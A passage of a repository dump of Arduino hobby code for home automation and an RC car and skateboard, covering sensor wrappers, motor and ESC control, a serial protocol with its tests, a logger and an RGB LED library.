"text": "/*\n Provide bitlash wrap-up of a DS18B20 instance.\n DS18B20 instance has to be:\n 1. named \"ds18b20\";\n 2. exist as global variale\n*/\n\n// Note that bitlash requires return value to be of type \"numvar\", which is equivalent to \"signed long\" in Arduino.\n// So the temperature returned here is in unit of 0.001 Degree Celsius.\nnumvar ds18b20_get_temp(void)\n{\n //returns the temperature from one DS18S20 in DEG Celsius\n\n byte data[12];\n byte addr[8];\n\n if ( !ds18b20.search(addr)) {\n //no more sensors on chain, reset search\n ds18b20.reset_search();\n return -1000;\n }\n\n if ( OneWire::crc8( addr, 7) != addr[7]) {\n /* Serial.println(\"CRC is not valid!\"); */\n return -1000;\n }\n\n if ( addr[0] != 0x10 && addr[0] != 0x28) {\n /* Serial.print(\"Device is not recognized\"); */\n return -1000;\n }\n\n ds18b20.reset();\n ds18b20.select(addr);\n ds18b20.write(0x44,1); // start conversion, with parasite power on at the end\n\n byte present = ds18b20.reset();\n ds18b20.select(addr); \n ds18b20.write(0xBE); // Read Scratchpad\n\n\n for (int i = 0; i < 9; i++) { // we need 9 bytes\n data[i] = ds18b20.read();\n }\n\n ds18b20.reset_search();\n\n byte MSB = data[1];\n byte LSB = data[0];\n\n float tempRead = ((MSB << 8) | LSB); //using two's compliment\n float TemperatureSum = tempRead / 16;\n\n return (numvar)(TemperatureSum * 100);\n}\n\nvoid register_bitlash_ds18b20(void)\n{\n addBitlashFunction(\"ds18b20_get_temp\", (bitlash_function) ds18b20_get_temp);\n}"
},
{
"alpha_fraction": 0.4071294665336609,
"alphanum_fraction": 0.4183864891529083,
"avg_line_length": 18.035715103149414,
"blob_id": "8f3c74d4faa3c6994d63c9232fc2a0e1270ab120",
"content_id": "92eec1167f8c9f981ecc5b684ed22fa1c88df6dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 533,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/ArduinoController/Cmd.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"Cmd.h\"\n#ifdef USE_RELAY\n #include \"Relay.h\"\n extern Relay relay;\n#endif\n\n/****************************************************************************/\nCmd::Cmd(String __cmdS):\n _cmdS(__cmdS)\n{\n}\n\nvoid Cmd::execute(void)\n{\n for (int i=0;i<_cmdS.length();i++) {\n switch (_cmdS.charAt(i)) {\n #ifdef USE_RELAY\n case '0': relay.on(); break;\n case '1': relay.off(); break;\n #endif\n case 'd': delay(500); break;\n default:\n continue;\n }\n }\n}\n"
},
{
"alpha_fraction": 0.563018262386322,
"alphanum_fraction": 0.5829187631607056,
"avg_line_length": 33.485713958740234,
"blob_id": "575a50395ab85ee423cf27748cc01bd7bcc2506b",
"content_id": "4da536d136f9a066f36659dddabb1abc35921f3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1206,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 35,
"path": "/WifiCar/SerialProtocol/tests/testProtocol.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom ..protocol import RxPdu, Response, TemperatureResponse, TxPdu, Command, TemperatureCommand\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nclass TestProtocol(unittest.TestCase):\n def test_RxPdu(self):\n a_str = 'RSP:OK:37.4;\\n'\n pdu = RxPdu(a_str)\n assert pdu.type == 'RSP'\n assert pdu.specific_fields == ('OK', '37.4')\n def test_Response(self):\n a_str = 'RSP:OK:37.4;\\n'\n response = Response(a_str)\n assert response.status == 'OK'\n assert response.parameters == ('37.4',)\n def test_TemperatureResponse(self):\n a_str = 'RSP:OK:37.4;\\n'\n t = TemperatureResponse(a_str)\n assert abs(t.value - 37.4) < 0.00001\n\n def test_TxPdU(self):\n p = TxPdu(pdu_type='CMD', specific_fields=('TEMPER',))\n assert str(p) == 'CMD:TEMPER;\\n'\n p = TxPdu('CMD', ())\n assert str(p) == 'CMD:;\\n'\n def test_Command(self):\n p = Command(specific_fields=('TEMPER',))\n assert str(p) == 'CMD:TEMPER;\\n'\n p = Command(())\n assert str(p) == 'CMD:;\\n'\n def test_TemperatureCommand(self):\n p = TemperatureCommand()\n assert str(p) == 'CMD:TEMPER;\\n'"
},
{
"alpha_fraction": 0.6021791100502014,
"alphanum_fraction": 0.6128089427947998,
"avg_line_length": 27.725191116333008,
"blob_id": "1a69a17a8ca13f848988d08c3579ca61cbc200b3",
"content_id": "59326542422e87e824889d4091c78055cf9d87fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3763,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 131,
"path": "/WifiCar/Motor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"Motor.h\"\n\n/****************************************************************************/\n\nMotor::Motor(int _enA, int _in1, int _in2, int _enB, int _in3, int _in4):\n enA(_enA), in1(_in1), in2(_in2), enB(_enB), in3(_in3), in4(_in4)\n{\n status = MOTOR_STATUS_STOP;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n speed = MOTOR_LOWEST_SPEED;\n}\n\nvoid Motor::init() {\n last_update = millis();\n}\n\nvoid Motor::idle() {\n unsigned long now = millis();\n long_execution_timer -= now - last_update;\n if (long_execution_timer < 0) {\n long_execution_timer = 0;\n }\n short_execution_timer -= now - last_update;\n if (short_execution_timer < 0) {\n short_execution_timer = 0;\n }\n if (long_execution_timer == 0) {\n stop();\n status = MOTOR_STATUS_STOP;\n } else if (short_execution_timer == 0) {\n if (status == MOTOR_STATUS_LEFT || status == MOTOR_STATUS_RIGHT) {\n forward();\n status = MOTOR_STATUS_FORWARD;\n }\n }\n}\n\nvoid Motor::execute(int op_code) {\n switch (op_code) {\n case OP_CODE_MOTOR_FORWARD: forward(); break;\n case OP_CODE_MOTOR_BACKWARD: backward(); break;\n case OP_CODE_MOTOR_STOP: stop(); break;\n case OP_CODE_MOTOR_SPEEDUP: speedup(); break;\n case OP_CODE_MOTOR_SPEEDDOWN: speeddown(); break;\n case OP_CODE_MOTOR_TURNLEFT: turnleft(); break;\n case OP_CODE_MOTOR_TURNRIGHT: turnright(); break;\n default: ;\n }\n}\n\nvoid Motor::forward() {\n digitalWrite(in1, HIGH);\n digitalWrite(in2, LOW);\n digitalWrite(in3, HIGH);\n digitalWrite(in4, LOW);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_FORWARD;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n}\n\nvoid Motor::backward() {\n digitalWrite(in1, LOW);\n digitalWrite(in2, HIGH);\n digitalWrite(in3, LOW);\n digitalWrite(in4, HIGH);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_BACKWARD;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n}\n\nvoid Motor::turnleft() {\n digitalWrite(in1, HIGH);\n digitalWrite(in2, LOW);\n digitalWrite(in3, LOW);\n digitalWrite(in4, HIGH);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_LEFT;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n\nvoid Motor::turnright() {\n digitalWrite(in1, LOW);\n digitalWrite(in2, HIGH);\n digitalWrite(in3, HIGH);\n digitalWrite(in4, LOW);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_RIGHT;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n\nvoid Motor::stop() {\n digitalWrite(in1, LOW);\n digitalWrite(in2, LOW);\n digitalWrite(in3, LOW);\n digitalWrite(in4, LOW);\n analogWrite(enA, 0);\n analogWrite(enB, 0);\n status = MOTOR_STATUS_STOP;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n}\n\nvoid Motor::speedup() {\n speed += MOTOR_SPEED_STEP;\n if (speed > MOTOR_HIGHEST_SPEED) {\n speed = MOTOR_HIGHEST_SPEED;\n }\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n\nvoid Motor::speeddown() {\n speed -= MOTOR_SPEED_STEP;\n if (speed < MOTOR_LOWEST_SPEED) {\n speed = MOTOR_LOWEST_SPEED;\n }\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n"
},
{
"alpha_fraction": 0.676902174949646,
"alphanum_fraction": 0.7027173638343811,
"avg_line_length": 29.92436981201172,
"blob_id": "1f30a8a9f757055ac313870562c418e532029678",
"content_id": "2c0ee3077b4dec57db0243837f8daf193b4a140d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 119,
"path": "/escSmoother/escSmoother.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include <Servo.h>\n\n/*\n My RC controller:\n 1. connections:\n Throttle is on Channel 2\n The wheel is on Channel 1\n Switch button on Channel 3\n 2. functionality\n a. Throttle: smoothed so that\n 1) it can produce only motor speed in [NEUTRAL, FULL_FORWARD / THROTTLE_SMOOTH_FACTOR]\n to reach full speed, use the Wheel\n * work-around to that the Red Brick ESC + Motor does not spin until ~1550us pulse.\n There is a THROTTLE_SMOOTH_OFFSET about 30us as well.\n b. Wheel:\n 1) When the wheel is at neutral, ignore input from throttle;\n 2) otherwise the wheel input is transparently passed on to ESC.\n c. swith button on Channel 3: not used yet\n*/\n\n// Debug flags\n#define ENABLE_DEBUG // enable this line if get debug print\n\n#ifdef ENABLE_DEBUG\n#define DDD Serial\nunsigned long last_debug_print_time;\nunsigned long curr_time;\nconst unsigned long debug_print_interval = 500; // ms\n#endif // ENABLE_DEBUG\n\n// motor speed/drive constants\nconst long NEUTRAL = 1530;\nconst long FULL_FORWARD = 2000;\nconst long FULL_REVERSE = 1000;\n\nconst long THROTTLE_SMOOTH_FACTOR = 4;\nconst long THROTTLE_SMOOTH_OFFSET = 30;\nconst long BIAS_WINDOW = THROTTLE_SMOOTH_OFFSET;\n\n// channel 2 on pin D2\nconst int ch2Pin = 2;\nvolatile long pulseStartTimeCh2 = 0;\nvolatile long lastPulseWidthCh2 = 0;\n\n// channel 1 on pin D3\nconst int ch1Pin = 3;\nvolatile long pulseStartTimeCh1 = 0;\nvolatile long lastPulseWidthCh1 = 0;\n\n// channel 3 (on/off only) on pin D4\nconst int ch3Pin = 4;\n\n// two ESC can be connected\nconst int esc0Pin = A0;\nconst int esc1Pin = A1;\n\nServo esc0, esc1;\n\nvoid setup() {\n attachInterrupt(digitalPinToInterrupt(ch2Pin), pulseInCh2, CHANGE);\n attachInterrupt(digitalPinToInterrupt(ch1Pin), pulseInCh1, CHANGE);\n esc0.attach(esc0Pin);\n esc1.attach(esc1Pin);\n //pinMode(ch3Pin, INPUT_PULLUP);\n#ifdef ENABLE_DEBUG\n DDD.begin(9600);\n last_debug_print_time = 0;\n#endif\n}\n\nvoid loop() {\n long wheelPulseWidth = lastPulseWidthCh1;\n long throttlePulseWidth = lastPulseWidthCh2;\n#ifdef ENABLE_DEBUG\n curr_time = millis();\n if (last_debug_print_time > curr_time || last_debug_print_time + debug_print_interval <= curr_time) {\n DDD.print(\"Ch1: \");\n DDD.print(wheelPulseWidth);\n DDD.print(\"; Ch2: \");\n DDD.println(throttlePulseWidth);\n last_debug_print_time = millis();\n }\n#endif\n // if Wheel is not at neutral\n if (wheelPulseWidth < NEUTRAL - BIAS_WINDOW || wheelPulseWidth > NEUTRAL + BIAS_WINDOW) {\n // pass Wheel throttle transparently to both ESC's\n esc0.writeMicroseconds(wheelPulseWidth);\n esc1.writeMicroseconds(wheelPulseWidth);\n } else {\n // the wheel is at neutral, apply smoothed throttle input\n if (throttlePulseWidth > NEUTRAL + BIAS_WINDOW) {\n esc0.writeMicroseconds((throttlePulseWidth - NEUTRAL - BIAS_WINDOW) / THROTTLE_SMOOTH_FACTOR + NEUTRAL + THROTTLE_SMOOTH_OFFSET);\n esc1.writeMicroseconds((throttlePulseWidth - NEUTRAL - BIAS_WINDOW) / THROTTLE_SMOOTH_FACTOR + NEUTRAL + THROTTLE_SMOOTH_OFFSET);\n } else if (throttlePulseWidth >= FULL_REVERSE) {\n esc0.writeMicroseconds(throttlePulseWidth);\n esc1.writeMicroseconds(throttlePulseWidth);\n } else {\n // RC controller could be turned off. we want to arm ESC anyway.\n esc0.writeMicroseconds(FULL_REVERSE);\n esc1.writeMicroseconds(FULL_REVERSE);\n }\n }\n}\n\nvoid pulseInCh2() {\n if (digitalRead(ch2Pin)) {\n pulseStartTimeCh2 = micros();\n } else {\n lastPulseWidthCh2 = micros() - pulseStartTimeCh2;\n }\n}\n\nvoid pulseInCh1() {\n if (digitalRead(ch1Pin)) {\n pulseStartTimeCh1 = micros();\n } else {\n lastPulseWidthCh1 = micros() - pulseStartTimeCh1;\n }\n}\n"
},
{
"alpha_fraction": 0.5927272439002991,
"alphanum_fraction": 0.6327272653579712,
"avg_line_length": 16.1875,
"blob_id": "afd49ee3a7c1a5b9013e4f87e1808131e103d032",
"content_id": "a9c4ebfd868da0344359dbb8dfbab5eed6d91911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 16,
"path": "/elSkateboard/VoltageSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __VOLTAGE_SENSOR_H__\n#define __VOLTAGE_SENSOR_H__\n\n#include <Arduino.h>\n#define VOLTAGE_RESOLUTION 0.0244 // = 5V * 5 / 1024\n\nclass VoltageSensor\n{\n private:\n int pin;\n\n public:\n VoltageSensor(int _pin);\n float read();\n};\n#endif // __VOLTAGE_SENSOR_H__\n"
},
{
"alpha_fraction": 0.6759322285652161,
"alphanum_fraction": 0.680338978767395,
"avg_line_length": 42.39706039428711,
"blob_id": "9c9345785458fb34d7e03c066bc4b5939a9ee5a0",
"content_id": "e478c52e738b9d3d39fe35e79ec3dd7cabefb878",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2950,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 68,
"path": "/WifiCar/README.md",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "The ambition of this little project is to build a remote control car connected through Wifi network.\n\n# Materials\n- Raspberry Pi Model B+ (x1)\n- Arduino Nano (x1)\n- USB cable for Arduino Nano\n- USB wifi dongle for Pi\n\n# Building steps\n\n## Setup Arduino IDE on Pi\n\n## Test serial over USB\n1. connect: Pi USB <-> Nano USB\n2. upload sketch ```echoSerial.ino``` to Nano\n3. start script ```echoSerial.py``` on Pi\n4. type lines in cmd on Pi and Nano should echo whatever sent over back to Pi\n\n# Design\n\n## Communication protocol between Pi and Nano over serial port\n- only ASCII characters are used\n- it uses a simple command and response mechanism\n- procedure on Pi\n - Pi starts in IDLE state\n - in IDLE state, Pi can send a COMMAND and enter WAIT state\n - in WAIT state, Pi waits for a RESPONSE, and enter IDLE state if one arrives or WAIT_TIMER expires\n- procedure on Nano\n - Nano starts in IDLE state\n - in IDLE state, Nano waits for one COMMAND and enters WORK state if one arrives\n - in WORK state, Nano executes received COMMAND and sends one RESPONSE after it is done\n - in WORK state, Nano enters IDLE state after a RESPOMSE is sent\n- protocol data unit format:\n - each field is represented as <field name>\n - all fields are strings\n - ```\"<type>:<type specific fields>;\\n\"```\n - ```<type>``` can be one of values ```(\"CMD\", \"RSP\", \"DEB\")```\n- COMMAND:\n - ```\"CMD:<operation>[:<paremeter0>:<paremeter1>...:<paremeterN>];\\n\"```\n - ```<operation>``` can be one of values:\n - ```\"ECHO\"```: ask Nano to compose a RESPONSE that contains all parsed field of this message\n - ```\"TEMPER\"```: report temperature using temperature sensor. One paremeter is expected in RESPONSE. One successful RESPONSE could be ```\"RSP:OK:27.3;\\n```.\n - ```\"FORWARD\"```: drive motor to move forward\n - ```\"BACKWARD\"```: drive motor to move backward\n - ```\"STOP\"```: motor stop\n - ```\"SPEEDUP\"```: motor speed up\n - ```\"SPEEDDOWN\"```: motor speed down\n - ```\"TURNLEFT\"```: motor turn left\n - ```\"TURNRIGHT\"```: motor turn right\n- RESPONSE:\n - ```\"RSP:<status>[:<paremeter0>:<paremeter1>...:<paremeterN>];\\n\"```\n - ```<status>``` can be:\n - ```\"OK\"```: execution succeeded\n - ```\"NOK\"```: execution failed\n - ```\"NOT_SUPPORTED\"```: command is not supported\n- DEBUG MESSAGE:\n - ```\"DEB:<a string>;```\n - this can only be sent from Nano to Pi, not vice versa.\n - used to send debug message or log. Such a message is not parsed or interpreted by this protocol.\n- timers:\n - WAIT_TIMER\n - how much miliseconds should Pi wait after sending a COMMAND before it receives a RESPONSE\n - on expiration: discard current COMMAND, increase COUNTER_WAIT_TIMER, then go to IDLE state\n - RESET_TIMER\n - how much miliseconds should Pi wait after it resets Nano\n - when this timer is bigger than zero, Pi should not send any COMMAND to Nano\n- counters:\n - COUNTER_WAIT_TIMER: when it is bigger than MAX_WAIT_TIMER, reset Nano"
},
{
"alpha_fraction": 0.7202268242835999,
"alphanum_fraction": 0.7240075469017029,
"avg_line_length": 23.090909957885742,
"blob_id": "ecf8271cda61915498d7d4e6e179391990599f2a",
"content_id": "62b0d27271b265792a34e384ab192eccb374ad9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 22,
"path": "/ArduinoController/bitlashInfraredSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Provide bitlash wrap-up of a infrared sensor instance.\n Light sensor instance has to be:\n 1. named \"infraredSensor\";\n 2. exist as global variale\n*/\n\nnumvar infraredSensor_get(void)\n{\n return infraredSensor.get();\n}\n\nnumvar infraredSensor_pin(void)\n{\n return infraredSensor.pin();\n}\n\nvoid register_bitlash_infraredSensor(void)\n{\n addBitlashFunction(\"infraredSensor_get\", (bitlash_function) infraredSensor_get);\n addBitlashFunction(\"infraredSensor_pin\", (bitlash_function) infraredSensor_pin);\n}"
},
{
"alpha_fraction": 0.6622418761253357,
"alphanum_fraction": 0.6710914373397827,
"avg_line_length": 18.882352828979492,
"blob_id": "7dcb8cbc9303b236ee495259e8766b6b2c2fa539",
"content_id": "faad02703d4262bf7ef328cce8ae122b3acb7a92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 34,
"path": "/lib/InfraredSensor/InfraredSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n \n Connection:\n VCC -> 5V\n GND -> GND\n OUT -> any digital INPUT pin\n */\n\n#ifndef __INFRAREDSENSOR_H__\n#define __INFRAREDSENSOR_H__\n\n#define InfraredSensor_ON LOW\n#define InfraredSensor_OFF HIGH\n\n#include <Arduino.h>\n\nclass InfraredSensor\n{\nprivate:\n unsigned int _pin;\n\npublic:\n InfraredSensor(unsigned int __pin);\n unsigned int pin(void);\n void begin(void);\n bool get(void);\n};\n\n#endif // __INFRAREDSENSOR_H__\n\n\n"
},
{
"alpha_fraction": 0.5864502191543579,
"alphanum_fraction": 0.5942131280899048,
"avg_line_length": 22.616666793823242,
"blob_id": "fb3ed469ab684403e329d0c3f8ffdcb96ed29d99",
"content_id": "07863f7529f53ad45e2f0e851632936155317109",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1417,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 60,
"path": "/elSkateboard/Logger.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __LOGGER_CPP__\n#define __LOGGER_CPP__\n\n#include \"Logger.h\"\n\nLogger::Logger(String _fileName):\n fileName(_fileName){\n LogS logs[LOGGER_BUFFER_LENGTH];\n entryNum = 0;\n writeIndex = 0;\n readIndex = 0;\n\n for (int i=0; i<LOGGER_BUFFER_LENGTH; i++) {\n logs[i].timeMs = 0;\n logs[i].type = EMPTY;\n logs[i].value = 0.0;\n }\n}\n\nvoid Logger::clearFile() {\n if (FileSystem.exists(fileName.c_str())) {\n FileSystem.remove(fileName.c_str());\n }\n}\n\nvoid Logger::writeToMem(long timeMs, byte type, float value) {\n byte wi = writeIndex;\n writeIndex = (writeIndex + 1) & LOGGER_BUFFER_INDEX_MASK;\n entryNum++;\n logs[wi].timeMs = timeMs;\n logs[wi].type = type;\n logs[wi].value = value;\n}\n\nvoid Logger::writeToFile() {\n byte ri;\n if (entryNum > 0) {\n File dataFile = FileSystem.open(LOGGER_DEFAULT_FILE_NAME, FILE_APPEND);\n while (entryNum > 0) {\n ri = readIndex;\n readIndex = (readIndex + 1) & LOGGER_BUFFER_INDEX_MASK;\n entryNum--;\n #ifdef ENABLE_DEBUG\n DDD.print(logs[ri].timeMs);\n DDD.print(\"\\t\");\n DDD.print(logs[ri].type);\n DDD.print(\"\\t\");\n DDD.println(logs[ri].value);\n #endif\n dataFile.print(logs[ri].timeMs);\n dataFile.print(\"\\t\");\n dataFile.print(logs[ri].type);\n dataFile.print(\"\\t\");\n dataFile.println(logs[ri].value);\n }\n dataFile.close();\n }\n}\n\n#endif // __LOGGER_CPP__\n"
},
{
"alpha_fraction": 0.6548821330070496,
"alphanum_fraction": 0.6632996797561646,
"avg_line_length": 17,
"blob_id": "3e40c02f14c3aca48de90124b3ae980f88cfe175",
"content_id": "dc85b9d0428940d4f3eeab5cb4c96cf76f11481c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 33,
"path": "/lib/LightSensor/LightSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"LightSensor.h\"\n\nLightSensor::LightSensor(unsigned int __pin): _pin(__pin)\n{\n}\n\nvoid LightSensor::begin()\n{\n pinMode(_pin, INPUT);\n}\n\nunsigned int LightSensor::pin()\n{\n return _pin;\n}\n\nbool LightSensor::get()\n{\n if (digitalRead(_pin) == LIGHTSENSOR_DARK)\n {\n return LIGHTSENSOR_DARK;\n } else {\n return LIGHTSENSOR_LIGHT;\n }\n}\n"
},
{
"alpha_fraction": 0.5955590605735779,
"alphanum_fraction": 0.6249008774757385,
"avg_line_length": 20.016666412353516,
"blob_id": "2a68102f3835dab19b9d7bf07a1ac680915e9798",
"content_id": "1d27b10a7e343b98c6856203f715be7a86bb5785",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 60,
"path": "/lib/RbgLight/examples/RbgLight/RbgLight.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nControl RGB LED light.\n\nConnection:\n V -> GND\n R -> as defined below\n B -> as defined below\n G -> as defined below\n*/\n#include \"RbgLight.h\"\n#include \"bitlash.h\"\n\n#define SERIAL_BAUD_RATE 57600\n\nRbgLight rbgLight(9, 10, 11, HIGH);\n\nnumvar timer1(void) { \n\treturn TCNT1; \t// return the value of Timer 1\n}\n\nnumvar light_on(void)\n{\n if (getarg(0) == 0)\n {\n // use default color\n rbgLight.on(rbgLight.default_color());\n } else {\n rbgLight.on(getarg(1));\n }\n return 0;\n}\n\nnumvar light_off(void)\n{\n rbgLight.off();\n return 0;\n}\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n rbgLight.begin();\n initBitlash(SERIAL_BAUD_RATE);\n randomSeed(0);\n addBitlashFunction(\"timer1\", (bitlash_function) timer1);\n addBitlashFunction(\"light_on\", (bitlash_function) light_on);\n addBitlashFunction(\"light_off\", (bitlash_function) light_off);\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n runBitlash();\n //rbgLight.on(random(0, 8));\n //rbgLight.flash_pattern(random(0, 8));\n //rbgLight.on(random(0, 8));\n //digitalWrite(1, HIGH);\n //delay(1000);\n // rbgLight.off();\n //rbgLight.flash(random(1, 8));\n //delay(500);\n}\n"
},
{
"alpha_fraction": 0.4595375657081604,
"alphanum_fraction": 0.4778420031070709,
"avg_line_length": 30.18181800842285,
"blob_id": "e41e15d059c9342c5dd0f0768a0404397b9424d8",
"content_id": "9ea6db864d8d4be76619721912e3c0244d1814f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 33,
"path": "/lib/UltraSoundDistanceMeas/README.md",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "# Control ultra sound distance measuring chip\n \nDesign Goals: This library is designed to be... \n \n* Easy control ultra sound distance measuring chip\n \nSupported Boards: \n \n* Uno\n\n## Pin layout\n\nThe table below shows how to connect the the pins of the RBG LED light\nto Arduino UNO board.\nR, B, and G pins are configurable.\n\n| PIN | RBG LED | Arduino UNO | ATtiny25/45/85 [0] | ATtiny44/84 [1] |\n|-----|----------|-------------|--------------------|-----------------|\n| 1 | VCC | 5V | | |\n| 2 | Trig | 9 | | |\n| 3 | Echo | 8 | | |\n| 4 | GND | GND | | |\n\n\n**Constructor:**\n\n UltraSoundDistanceMeas(unsigned int _trig_pin, unsigned int _echo_pin);\n _trig_pin: which pin is connected to Trig;\n _echo_pin: which pin is connected to Echo;\n\n**Usage:**\n\n See example. Note that measured distance is in micrometers.\n \n "
},
{
"alpha_fraction": 0.5317782163619995,
"alphanum_fraction": 0.5371872782707214,
"avg_line_length": 22.4761905670166,
"blob_id": "f3b50e3b34b5658fdef6d48f2ea789afc1f7ce10",
"content_id": "44b787eda866ff7e44e4e05a4034fd9f523c8e4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2958,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 126,
"path": "/lib/RbgLight/RbgLight.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"RbgLight.h\"\n\n/****************************************************************************/\nvoid RbgLight::on(unsigned int color)\n{\n if (color & RBGLIGHT_RED)\n {\n digitalWrite(r_pin, light_on_lvl);\n } else {\n digitalWrite(r_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_BLUE)\n {\n digitalWrite(b_pin, light_on_lvl);\n } else {\n digitalWrite(b_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_GREEN)\n {\n digitalWrite(g_pin, light_on_lvl);\n } else {\n digitalWrite(g_pin, light_off_lvl);\n }\n}\n\nvoid RbgLight::begin()\n{\n pinMode(r_pin, OUTPUT);\n pinMode(b_pin, OUTPUT);\n pinMode(g_pin, OUTPUT);\n cur_lvl = 10;\n}\n\nvoid RbgLight::flash(unsigned int color, unsigned int interval)\n{\n on(color);\n delay(interval);\n off();\n}\n\n/****************************************************************************/\nvoid RbgLight::off()\n{\n digitalWrite(r_pin, light_off_lvl);\n digitalWrite(b_pin, light_off_lvl);\n digitalWrite(g_pin, light_off_lvl);\n}\n\n/****************************************************************************/\nRbgLight::RbgLight( unsigned int _r_pin, unsigned int _b_pin,\n unsigned int _g_pin, bool _light_on_lvl):\n r_pin(_r_pin), b_pin(_b_pin), g_pin(_g_pin), light_on_lvl(_light_on_lvl)\n{\n light_off_lvl = !light_on_lvl;\n pattern_progressing_increse = true;\n pattern_progressing_step = 20;\n _default_color = RBGLIGHT_RED;\n}\n\nvoid RbgLight::set_pattern(unsigned int _pattern)\n{\n switch (_pattern)\n {\n case RBGLIGHT_PATTERN_PROGRESSING:\n pattern = RBGLIGHT_PATTERN_PROGRESSING;\n break;\n default:\n pattern = RBGLIGHT_PATTERN_PROGRESSING;\n }\n}\n\nunsigned int RbgLight::default_color()\n{\n return _default_color;\n}\n\nvoid RbgLight::flash_pattern(unsigned int color)\n{\n if (color & RBGLIGHT_RED)\n {\n analogWrite(r_pin, cur_lvl);\n } else {\n digitalWrite(r_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_BLUE)\n {\n analogWrite(b_pin, cur_lvl);\n } else {\n digitalWrite(b_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_GREEN)\n {\n analogWrite(g_pin, cur_lvl);\n } else {\n digitalWrite(g_pin, light_off_lvl);\n }\n // calculate next level\n if (pattern_progressing_increse)\n {\n cur_lvl += pattern_progressing_step;\n if (cur_lvl >= 